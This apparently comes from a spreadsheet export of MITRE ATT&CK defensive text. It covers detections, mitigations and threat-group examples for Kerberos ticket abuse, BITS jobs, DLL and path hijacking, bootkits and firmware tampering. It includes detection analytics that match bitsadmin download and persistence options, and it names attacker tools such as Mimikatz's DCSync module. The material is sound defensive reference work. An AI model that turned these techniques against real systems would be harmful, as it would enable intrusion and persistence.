Monitor requests of new ticket granting ticket or service tickets to a Domain Controller. Event ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to "Integrity check on decrypted field failed" and indicates misuse by a previously invalidated golden ticket.(Citation: CERT-EU Golden Ticket Protection)
Logon Session Creation
Monitor for newly constructed logon behavior that may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls.
User Account Authentication
Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
Active Directory Configuration
To contain the impact of a previously generated golden ticket, reset the built-in KRBTGT account password twice, which will invalidate any existing golden tickets that have been created with the KRBTGT hash and other Kerberos tickets derived from it.(Citation: ADSecurity Kerberos and KRBTGT) For each domain, change the KRBTGT account password once, force replication, and then change the password a second time. Consider rotating the KRBTGT account password every 180 days.(Citation: STIG krbtgt reset)
Password Policies
Ensure that local administrator accounts have complex, unique passwords.
Privileged Account Management
Limit domain admin account permissions to domain controllers and limited servers. Delegate other admin functions to separate accounts.(Citation: ADSecurity AD Kerberos Attacks)
User Account Management
Do not allow a user to be a local administrator for multiple systems.
APT29
[APT29](https://attack.mitre.org/groups/G0016) used Kerberos ticket attacks for lateral movement.(Citation: Mandiant No Easy Breach)
APT32
[APT32](https://attack.mitre.org/groups/G0050) successfully gained remote access by using pass the ticket.(Citation: Cybereason Cobalt Kitty 2017)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has created forged Kerberos Ticket Granting Ticket (TGT) and Ticket Granting Service (TGS) tickets to maintain administrative access.(Citation: Secureworks BRONZE BUTLER Oct 2017)
Mimikatz
[Mimikatz](https://attack.mitre.org/software/S0002)’s &lt;code&gt;LSADUMP::DCSync&lt;/code&gt; and &lt;code&gt;KERBEROS::PTT&lt;/code&gt; modules implement the three steps required to extract the krbtgt account hash and create/use Kerberos tickets.(Citation: Adsecurity Mimikatz Guide)(Citation: AdSecurity Kerberos GT Aug 2015)(Citation: Harmj0y DCSync Sept 2015)(Citation: NCSC Joint Report Public Tools)
Pupy
[Pupy](https://attack.mitre.org/software/S0192) can also perform pass-the-ticket.(Citation: GitHub Pupy)
SeaDuke
Some [SeaDuke](https://attack.mitre.org/software/S0053) samples have a module to use pass the ticket with Kerberos for authentication.(Citation: Symantec Seaduke 2015)
</t>
  </si>
  <si>
    <t xml:space="preserve">Active Directory Credential Request
Monitor requests of new ticket granting ticket or service tickets to a Domain Controller, such as Windows EID 4769 or 4768, that may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls.
Application Log Content
Monitor for third-party application logging, messaging, and/or other artifacts that may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls.
Logon Session Creation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User Account Authentication
Monitor for an attempt by a user to gain access to a network or computing resource, often by providing credentials that may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls.
Web Credential Usage
Monitor for an attempt by a user to gain access to a network or computing resource by providing web credentials (ex: Windows EID 1202) that may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls.
Privileged Account Management
Limit credential overlap across systems to prevent the damage of credential compromise and reduce the adversary's ability to perform Lateral Movement between systems.
User Account Management
Enforce the principle of least-privilege. Do not allow a domain user to be in the local administrator group on multiple systems.
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used forged SAML tokens that allowed the actors to impersonate users and bypass MFA, enabling [APT29](https://attack.mitre.org/groups/G0016) to access enterprise cloud applications and services.(Citation: Microsoft 365 Defender Solorigate)(Citation: Secureworks IRON RITUAL Profile)
FoggyWeb
[FoggyWeb](https://attack.mitre.org/software/S0661) can allow abuse of a compromised AD FS server's SAML token.(Citation: MSTIC FoggyWeb September 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments in command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration.
Firmware Modification
Monitor for changes to boot information including system uptime, image booted, and startup configuration to determine if results are consistent with expected behavior in the environment.  (Citation: Cisco IOS Software Integrity Assurance - Boot Information) Monitor unusual connections or connection attempts to the device that may specifically target TFTP or other file-sharing protocols.
Network Connection Creation
Monitor for newly constructed network device configuration and system image against a known-good version to discover unauthorized changes to system boot, startup configuration, or the running OS. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) (Citation: Cisco IOS Software Integrity Assurance - Image File Verification) The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.
Audit
Periodically check the integrity of the running configuration and system image to ensure they have not been modified. (Citation: Cisco IOS Software Integrity Assurance - Image File Verification) (Citation: Cisco IOS Software Integrity Assurance - Image File Integrity) (Citation: Cisco IOS Software Integrity Assurance - Change Control) 
Boot Integrity
Enable secure boot features to validate the digital signature of the boot environment and system image using a special purpose hardware device. If the validation check fails, the device will fail to boot preventing loading of unauthorized software. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) 
Limit Access to Resource Over Network
Restrict use of protocols without encryption or authentication mechanisms. Limit access to administrative and management interfaces from untrusted network sources. 
Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific protocols, such as TFTP, can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific technique used by a particular adversary or tool, and will likely be different across various network configurations. 
Operating System Configuration
Follow vendor device hardening best practices to disable unnecessary and unused features and services, avoid using default configurations and passwords, and introduce logging and auditing for detection.
Privileged Account Management
Use of Authentication, Authorization, and Accounting (AAA) systems will limit actions administrators can perform and provide a history of user actions to detect unauthorized use and abuse. TACACS+ can keep control over which commands administrators are permitted to use through the configuration of authentication and command authorization. (Citation: Cisco IOS Software Integrity Assurance - AAA) (Citation: Cisco IOS Software Integrity Assurance - TACACS)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments from the BITSAdmin tool (especially the ‘Transfer’, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options)(Citation: Microsoft BITS) Admin logs, PowerShell logs, and the Windows Event log for BITS activity.(Citation: Elastic - Hunting for Persistence Part 1) Also consider investigating more detailed information about jobs by parsing the BITS job database.(Citation: CTU BITS Malware June 2016)
Network Connection Creation
Monitor for newly constructed network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account).
Process Creation
Monitor for newly constructed BITS tasks to enumerate using the BITSAdmin tool (bitsadmin /list /allusers /verbose). 
Note: Event IDs are for Sysmon (Event ID 1 - process create) and Windows Security Log (Event ID 4688 - a new process has been created). Analytic 1 is oriented around looking for the creation of Microsoft Background Intelligent Transfer Service utility (bitsadmin.exe) processes that schedule a BITS job to persist on an endpoint. The analytic identifies the command-line parameters used to create, resume or add a file to a BITS job; these are typically seen combined in a single command-line or executed in sequence.
Analytic 2 identifies Microsoft Background Intelligent Transfer Service utility &lt;code&gt; bitsadmin.exe &lt;/code&gt; using the &lt;code&gt; transfer&lt;/code&gt; parameter to download a remote object. In addition, look for &lt;code&gt; download &lt;/code&gt; or &lt;code&gt; upload &lt;/code&gt; on the command-line, the switches are not required to perform a transfer. Capture any files downloaded. Review the reputation of the IP or domain used. Typically once executed, a follow on command will be used to execute the dropped file. Network connection or file modification events related will not spawn or create from &lt;code&gt; bitsadmin.exe &lt;/code&gt;, but the artifacts will appear in a parallel process of &lt;code&gt; svchost.exe &lt;/code&gt; with a command-line similar to &lt;code&gt; svchost.exe -k netsvcs -s BITS &lt;/code&gt;. It’s important to review all parallel and child processes to capture any behaviors and artifacts. In some suspicious and malicious instances, BITS jobs will be created. You can use &lt;code&gt; bitsadmin /list /verbose &lt;/code&gt; to list out the jobs during investigation.
&lt;h4&gt; Analytic 1 - BITS Job Persistence &lt;/h4&gt;
&lt;code&gt; processes = filter processes where (
  (event_id == "1" OR event_id == "4688") AND
  exe ="C:\Windows\System32\bitsadmin.exe" AND 
  (command_line == "*create*" OR
   command_line == "*addfile*" OR 
   command_line == "*setnotifyflags*" OR
   command_line == "*setnotifycmdline*" OR
   command_line == "*setminretrydelay*" OR 
   command_line == "*setcustomheaders*" OR
   command_line == "*resume*")
)&lt;/code&gt;
&lt;h4&gt; Analytic 2 : BITSAdmin Download File &lt;/h4&gt;
&lt;code&gt; bitsadmin_commands = filter processes where (
  exe ="C:\Windows\System32\bitsadmin.exe" AND command_line = *transfer*)
output bitsadmin_commands &lt;/code&gt;
Service Metadata
BITS runs as a service and its status can be checked with the Sc query utility (&lt;code&gt;sc query bits&lt;/code&gt;).(Citation: Microsoft Issues with BITS July 2011)
Filter Network Traffic
Modify network and/or host firewall rules, as well as other network controls, to only allow legitimate BITS traffic.
Operating System Configuration
Consider reducing the default BITS job lifetime in Group Policy or by editing the &lt;code&gt;JobInactivityTimeout&lt;/code&gt; and &lt;code&gt;MaxDownloadTime&lt;/code&gt; Registry values in &lt;code&gt; HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS&lt;/code&gt;.(Citation: Microsoft BITS)
User Account Management
Consider limiting access to the BITS interface to specific users or groups.(Citation: Symantec BITS May 2007)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has used the BITS protocol to exfiltrate stolen data from a compromised host.(Citation: FBI FLASH APT39 September 2020)
APT41
[APT41](https://attack.mitre.org/groups/G0096) used [BITSAdmin](https://attack.mitre.org/software/S0190) to download and install payloads.(Citation: FireEye APT41 March 2020)(Citation: Crowdstrike GTR2020 Mar 2020)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has used [BITSAdmin](https://attack.mitre.org/software/S0190) to download additional tools.(Citation: FireEye Periscope March 2018)
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) has used BITS jobs to download malicious payloads.(Citation: Unit 42 BackConfig May 2020)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has used batch scripts that utilizes WMIC to execute a [BITSAdmin](https://attack.mitre.org/software/S0190) transfer of a ransomware payload to each compromised machine.(Citation: Mandiant FIN12 Oct 2021) 
BITSAdmin
[BITSAdmin](https://attack.mitre.org/software/S0190) can be used to create [BITS Jobs](https://attack.mitre.org/techniques/T1197) to launch a malicious process.(Citation: TrendMicro Tropic Trooper Mar 2018)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) has been downloaded via Windows BITS functionality.(Citation: NCC Group Team9 June 2020)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can download a hosted "beacon" payload using [BITSAdmin](https://attack.mitre.org/software/S0190).(Citation: CobaltStrike Scripted Web Delivery)(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)
Egregor
[Egregor](https://attack.mitre.org/software/S0554) has used BITSadmin to download and execute malicious DLLs.(Citation: Intrinsec Egregor Nov 2020)
JPIN
A [JPIN](https://attack.mitre.org/software/S0201) variant downloads the backdoor payload via the BITS service.(Citation: Microsoft PLATINUM April 2016)
MarkiRAT
[MarkiRAT](https://attack.mitre.org/software/S0652) can use BITS Utility to connect with the C2 server.(Citation: Kaspersky Ferocious Kitten Jun 2021)
ProLock
[ProLock](https://attack.mitre.org/software/S0654) can use BITS jobs to download its malicious payload.(Citation: Group IB Ransomware September 2020)
UBoatRAT
[UBoatRAT](https://attack.mitre.org/software/S0333) takes advantage of the /SetNotifyCmdLine option in [BITSAdmin](https://attack.mitre.org/software/S0190) to ensure it stays running on a system to maintain persistence.(Citation: PaloAlto UBoatRAT Nov 2017)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may execute their own malicious payloads by hijacking the way operating systems run programs.
File Creation
Monitor for newly constructed files that may execute their own malicious payloads by hijacking the way operating systems run programs.
File Modification
Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious.
Module Load
Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths.
Process Creation
Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so, abnormal process call trees). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.
Service Metadata
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Windows Registry Key Modification
Monitor for changes made to windows registry keys and/or values that may execute their own malicious payloads by hijacking the way operating systems run programs.
Application Developer Guidance
When possible, include hash values in manifest files to help prevent side-loading of malicious libraries.(Citation: FireEye DLL Side-Loading)
Audit
Use auditing tools capable of detecting hijacking opportunities on systems within an enterprise and correct them. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for hijacking weaknesses.(Citation: Powersploit)
Use the program sxstrace.exe that is included with Windows along with manual inspection to check manifest files for side-loading vulnerabilities in software.
Find and eliminate path interception weaknesses in program configuration files, scripts, the PATH environment variable, services, and in shortcuts by surrounding PATH variables with quotation marks when functions allow for them. Be aware of the search order Windows uses for executing or loading binaries and use fully qualified paths wherever appropriate.
Clean up old Windows Registry keys when software is uninstalled to avoid keys with no associated legitimate binaries. Periodically search for and correct or report path interception weaknesses on systems that may have been introduced using custom or available tools that report software using insecure path configurations.(Citation: Microsoft CreateProcess)(Citation: Microsoft Dynamic-Link Library Security)(Citation: Vulnerability and Exploit Detector)
Behavior Prevention on Endpoint
Some endpoint security solutions can be configured to block some types of behaviors related to process injection/memory tampering based on common sequences of indicators (ex: execution of specific API functions).
Execution Prevention
Adversaries may use new payloads to execute this technique. Identify and block potentially malicious software executed through hijacking by using application control solutions also capable of blocking libraries loaded by legitimate software.
Restrict File and Directory Permissions
Install software in write-protected locations. Set directory access controls to prevent file writes to the search paths for applications, both in the folders where applications are run from and the standard library folders.
Restrict Library Loading
Disallow loading of remote DLLs. This is included by default in Windows Server 2012+ and is available by patch for XP+ and Server 2003+.
Enable Safe DLL Search Mode to force search for system DLLs in directories with greater restrictions (e.g. &lt;code&gt;%SYSTEMROOT%&lt;/code&gt;)to be used before local directory DLLs (e.g. a user's home directory)
The Safe DLL Search Mode can be enabled via Group Policy at Computer Configuration &gt; [Policies] &gt; Administrative Templates &gt; MSS (Legacy): MSS: (SafeDllSearchMode) Enable Safe DLL search mode. The associated Windows Registry key for this is located at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\SafeDLLSearchMode&lt;/code&gt;(Citation: Microsoft More information about DLL)(Citation: Microsoft Dynamic Link Library Search Order)
Restrict Registry Permissions
Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.
Update Software
Update software regularly to include patches that fix DLL side-loading vulnerabilities.
User Account Control
Turn off UAC's privilege elevation for standard users &lt;code&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]&lt;/code&gt; to automatically deny elevation requests, add: &lt;code&gt;"ConsentPromptBehaviorUser"=dword:00000000&lt;/code&gt;. Consider enabling installer detection for all users by adding: &lt;code&gt;"EnableInstallerDetection"=dword:00000001&lt;/code&gt;. This will prompt for a password for installation and also log the attempt. To disable installer detection, instead add: &lt;code&gt;"EnableInstallerDetection"=dword:00000000&lt;/code&gt;. This may prevent potential elevation of privileges through exploitation during the process of UAC detecting the installer, but will allow the installation process to continue without being logged.  (Citation: Executable Installers are Vulnerable)
User Account Management
Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service binary target path locations. Deny execution from user directories such as file download directories and temp directories where able.
Ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory &lt;code&gt;C:&lt;/code&gt; and system directories, such as &lt;code&gt;C:\Windows\&lt;/code&gt;, to reduce places where malicious files could be placed for execution.
C0017
During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) established persistence by loading malicious libraries via modifications to the Import Address Table (IAT) within legitimate Microsoft binaries.(Citation: Mandiant APT41) 
Denis
[Denis](https://attack.mitre.org/software/S0354) replaces the nonexistent Windows DLL "msfte.dll" with its own malicious version, which is loaded by the SearchIndexer.exe and SearchProtocolHost.exe.(Citation: Cybereason Cobalt Kitty 2017)
Dtrack
One of [Dtrack](https://attack.mitre.org/software/S0567) can replace the normal flow of a program execution with malicious code.(Citation: CyberBit Dtrack)
ShimRat
[ShimRat](https://attack.mitre.org/software/S0444) can hijack the cryptbase.dll within migwiz.exe to escalate privileges and bypass UAC controls.(Citation: FOX-IT May 2016 Mofang)
</t>
  </si>
  <si>
    <t xml:space="preserve">Drive Modification
Monitor for changes to MBR and VBR as they occur for indicators for suspicious activity and further analysis. Take snapshots of MBR and VBR and compare against known good samples.
Boot Integrity
Use Trusted Platform Module technology and a secure or trusted boot process to prevent system integrity from being compromised. (Citation: TCG Trusted Platform Module) (Citation: TechNet Secure Boot Process)
Privileged Account Management
Ensure proper permissions are in place to help prevent adversary access to privileged accounts necessary to install a bootkit.
APT28
[APT28](https://attack.mitre.org/groups/G0007) has deployed a bootkit along with [Downdelph](https://attack.mitre.org/software/S0134) to ensure its persistence on the victim. The bootkit shares code with some variants of [BlackEnergy](https://attack.mitre.org/software/S0089).(Citation: ESET Sednit Part 3)
APT41
[APT41](https://attack.mitre.org/groups/G0096) deployed Master Boot Record bootkits on Windows systems to hide their malware and maintain persistence on victim systems.(Citation: FireEye APT41 Aug 2019)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) malware WhiskeyAlfa-Three modifies sector 0 of the Master Boot Record (MBR) to ensure that the malware will persist even if a victim machine shuts down.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)
BOOTRASH
[BOOTRASH](https://attack.mitre.org/software/S0114) is a Volume Boot Record (VBR) bootkit that uses the VBR to maintain persistence.(Citation: Mandiant M Trends 2016)(Citation: FireEye Bootkits)(Citation: FireEye BOOTRASH SANS)
Carberp
[Carberp](https://attack.mitre.org/software/S0484) has installed a bootkit on the system to maintain persistence.(Citation: ESET Carberp March 2012)
FinFisher
Some [FinFisher](https://attack.mitre.org/software/S0182) variants incorporate an MBR rootkit.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)
ROCKBOOT
[ROCKBOOT](https://attack.mitre.org/software/S0112) is a Master Boot Record (MBR) bootkit that uses the MBR to establish persistence.(Citation: FireEye Bootkits)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) can implant malicious code into a compromised device's firmware.(Citation: Eclypsium Trickboot December 2020)
WhisperGate
[WhisperGate](https://attack.mitre.org/software/S0689) overwrites the MBR with a bootloader component that performs destructive wiping operations on hard drives and displays a fake ransom note when the host boots.(Citation: Crowdstrike WhisperGate January 2022)(Citation: Cybereason WhisperGate February 2022)(Citation: Microsoft WhisperGate January 2022)(Citation: Cisco Ukraine Wipers January 2022)(Citation: Medium S2W WhisperGate January 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Driver Metadata
Monitor for unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation
Firmware Modification
Monitor for changes that may reveal indicators of malicious firmware such as strings. Also consider comparing components, including hashes of component firmware and behavior, against known good images.
OS API Execution
Monitor for API calls associated with the use of device drivers and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.
Update Software
Perform regular firmware updates to mitigate risks of exploitation and/or abuse.
Equation
[Equation](https://attack.mitre.org/groups/G0020) is known to have the capability to overwrite the firmware on hard drives from some manufacturers.(Citation: Kaspersky Equation QA) 
Cyclops Blink
[Cyclops Blink](https://attack.mitre.org/software/S0687) has maintained persistence by patching legitimate device firmware when it is downloaded, including that of WatchGuard devices.(Citation: NCSC Cyclops Blink February 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Firmware Modification
There are no documented means for defenders to validate the operation of the ROMMON outside of vendor support. If a network device is suspected of being compromised, contact the vendor to assist in further investigation.
Audit
Periodically check the integrity of system image to ensure it has not been modified. (Citation: Cisco IOS Software Integrity Assurance - Image File Integrity) (Citation: Cisco IOS Software Integrity Assurance - Image File Verification) (Citation: Cisco IOS Software Integrity Assurance - Change Control) 
Boot Integrity
Enable secure boot features to validate the digital signature of the boot environment and system image using a special purpose hardware device. If the validation check fails, the device will fail to boot preventing loading of unauthorized software. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) 
Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific protocols, such as TFTP, can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific technique used by a particular adversary or tool, and will likely be different across various network configurations.  
</t>
  </si>
  <si>
    <t xml:space="preserve">Firmware Modification
Monitor for changes made to firmware. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.
Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)
Boot Integrity
Check the integrity of the existing BIOS or EFI to determine if it is vulnerable to modification. Use Trusted Platform Module technology. (Citation: TCG Trusted Platform Module) Move system's root of trust to hardware to prevent tampering with the SPI flash memory.(Citation: ESET LoJax Sept 2018) Technologies such as Intel Boot Guard can assist with this. (Citation: Intel Hardware-based Security Technologies)
Privileged Account Management
Prevent adversary access to privileged accounts or access necessary to perform this technique.
Update Software
Patch the BIOS and EFI as necessary.
Hacking Team UEFI Rootkit
[Hacking Team UEFI Rootkit](https://attack.mitre.org/software/S0047) is a UEFI BIOS rootkit developed by the company Hacking Team to persist remote access software on some targeted systems.(Citation: TrendMicro Hacking Team UEFI) 
LoJax
[LoJax](https://attack.mitre.org/software/S0397) is a UEFI BIOS rootkit deployed to persist remote access software on some targeted systems.(Citation: ESET LoJax Sept 2018) 
Trojan.Mebromi
[Trojan.Mebromi](https://attack.mitre.org/software/S0001) performs BIOS modification and can download and execute a file as well as protect itself from removal.(Citation: Ge 2011)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Creation
Monitor for newly constructed dylibs
File Modification
Monitor file systems for moving, renaming, replacing, or modifying dylibs. Changes in the set of dylibs that are loaded by a process (compared to past behavior) that do not correlate with known software, patches, etc., are suspicious. Check the system for multiple dylibs with the same name and monitor which versions have historically been loaded into a process.
Module Load
Monitor for dynamic libraries being loaded. Run path dependent libraries can include LC_LOAD_DYLIB, LC_LOAD_WEAK_DYLIB, and LC_RPATH. Other special keywords are recognized by the macOS loader are @rpath, @loader_path, and @executable_path.(Citation: Apple Developer Doco Archive Run-Path) These loader instructions can be examined for individual binaries or frameworks using the otool -l command. Objective-See's Dylib Hijacking Scanner can be used to identify applications vulnerable to dylib hijacking
Restrict File and Directory Permissions
Set directory access controls to prevent file writes to the search paths for applications, both in the folders where applications are run from and the standard dylib folders.
Empire
[Empire](https://attack.mitre.org/software/S0363) has a dylib hijacker module that generates a malicious dylib given the path to a legitimate dylib of a vulnerable application.(Citation: Github PowerShell Empire)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor for the execution of commands and arguments that can be used for adversaries to modify services' registry keys and values through applications such as Windows Management Instrumentation and PowerShell. Additional logging may need to be configured to gather the appropriate data.
Process Creation
Monitor suspicious programs execution through services. These processes may show up as outlier processes that have not been seen before when compared against historical data.
Service Modification
Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity.
Windows Registry Key Modification
Monitor for modification of Registry keys and values used by services such as HKLM\SYSTEM\CurrentControlSet\Services that may allow adversaries to launch their own code when a service starts.
Restrict Registry Permissions
Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation. 
Operation Honeybee
During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors used a batch file that modified the COMSysApp service to load a malicious ipnet.dll payload and to load a DLL into the `svchost.exe` process.(Citation: McAfee Honeybee)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Creation
Monitor for creation of binaries and service executables that do not occur during a regular software update or an update scheduled by the organization. This behavior also considers files that are overwritten.
File Modification
Monitor for modification of binaries and service executables that do not occur during a regular software update or an update scheduled by the organization. Modification of files considers actions such as renaming and directory moving.
Process Creation
Monitor for newly executed processes that may execute their own malicious payloads by hijacking the binaries used by services.
Service Metadata
Hashing of binaries and service executables could be used to detect replacement against historical data.
Audit
Use auditing tools capable of detecting file system permissions abuse opportunities on systems within an enterprise and correct them. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for service file system permissions weaknesses.(Citation: Powersploit)
User Account Control
Turn off UAC's privilege elevation for standard users &lt;code&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]&lt;/code&gt;to automatically deny elevation requests, add: &lt;code&gt;"ConsentPromptBehaviorUser"=dword:00000000&lt;/code&gt;. Consider enabling installer detection for all users by adding: &lt;code&gt;"EnableInstallerDetection"=dword:00000001&lt;/code&gt;. This will prompt for a password for installation and also log the attempt. To disable installer detection, instead add: &lt;code&gt;"EnableInstallerDetection"=dword:00000000&lt;/code&gt;. This may prevent potential elevation of privileges through exploitation during the process of UAC detecting the installer, but will allow the installation process to continue without being logged.(Citation: Executable Installers are Vulnerable)
User Account Management
Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service binary target path locations. Deny execution from user directories such as file download directories and temp directories where able.
BlackEnergy
One variant of [BlackEnergy](https://attack.mitre.org/software/S0089) locates existing driver services that have been disabled and drops its driver component into one of those service's paths, replacing the legitimate executable. The malware then sets the hijacked service to start automatically to establish persistence.(Citation: F-Secure BlackEnergy 2014)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Creation
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Also,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File Modification
Monitor for programs metadata modifications such as deletion of the path to an executable since it makes programs vulnerable to this type of technique. Also, monitor modifications of files such as renaming programs using Windows system utilities names.
Process Creation
Monitor for newly executed processes  for process executable paths that are named for partial directories.
Audit
Find and eliminate path interception weaknesses in program configuration files, scripts, the PATH environment variable, services, and in shortcuts by surrounding PATH variables with quotation marks when functions allow for them. Be aware of the search order Windows uses for executing or loading binaries and use fully qualified paths wherever appropriate.
Clean up old Windows Registry keys when software is uninstalled to avoid keys with no associated legitimate binaries. Periodically search for and correct or report path interception weaknesses on systems that may have been introduced using custom or available tools that report software using insecure path configurations.(Citation: Microsoft CreateProcess)(Citation: Microsoft Dynamic-Link Library Security)(Citation: Vulnerability and Exploit Detector)
Execution Prevention
Adversaries will likely need to place new binaries in locations to be executed through this weakness. Identify and block potentially malicious software executed path interception by using application control tools, like Windows Defender Application Control, AppLocker, or Software Restriction Policies where appropriate.(Citation: SANS Application Whitelisting)(Citation: Microsoft Windows Defender Application Control)(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker)(Citation: Microsoft Application Lockdown)(Citation: Microsoft Using Software Restriction )
Restrict File and Directory Permissions
Ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory &lt;code&gt;C:&lt;/code&gt; and system directories, such as &lt;code&gt;C:\Windows\&lt;/code&gt;, to reduce places where malicious files could be placed for execution. Require that all executables be placed in write-protected directories.
Empire
[Empire](https://attack.mitre.org/software/S0363) contains modules that can discover and exploit search order hijacking vulnerabilities.(Citation: Github PowerShell Empire)
PowerSploit
[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Privesc-PowerUp modules that can discover and exploit search order hijacking vulnerabilities.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)
</t>
  </si>
  <si>
    <t xml:space="preserve">Logon Session Creation
Monitor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A remote desktop logon, through [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001), may be typical of a system administrator or IT support, but only from select workstations. Monitoring remote desktop logons and comparing to known/approved originating systems can detect lateral movement of an adversary.
Multiple users logged into a single machine at the same time, or even within the same hour, do not typically occur in networks we have observed.
Logon events are Windows Event Code 4624 for Windows Vista and above, 518 for pre-Vista. Logoff events are 4634 for Windows Vista and above, 538 for pre-Vista. Logon types 2, 3, 9 and 10 are of interest. For more details see the Logon Types table on Microsoft’s Audit Logon Events page.
&lt;h4&gt;Analytic 1 - Remote Desktop Logon&lt;/h4&gt;
&lt;code&gt;suspicious_netconn = filter network_connections where (event_id = “4624" AND AuthenticationPackageName = 'Negotiate' AND Severity = "Information" AND logon_type = "10")&lt;/code&gt;
&lt;h4&gt;Analytic 2 - Simultaneous Logins on a Host&lt;/h4&gt;
&lt;code&gt;users_grouped = group users_list by hostname
users_grouped = from users_grouped select min(time) as earliest_time, max(time) as latest_time count(user) as user_count
multiple_logins = filter users_grouped where (latest_time - earliest_time &lt;= 1 hour and user_count &gt; 1)&lt;/code&gt;
Logon Session Metadata
Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
User Account Authentication
Monitor for an attempt by a user to gain access to a network or computing resource, often by the use of domain authentication services, such as the System Security Services Daemon (sssd) on Linux
Note:
- For Windows, Security Logs events, including Event ID 4624, can be monitored to track user login behavior.
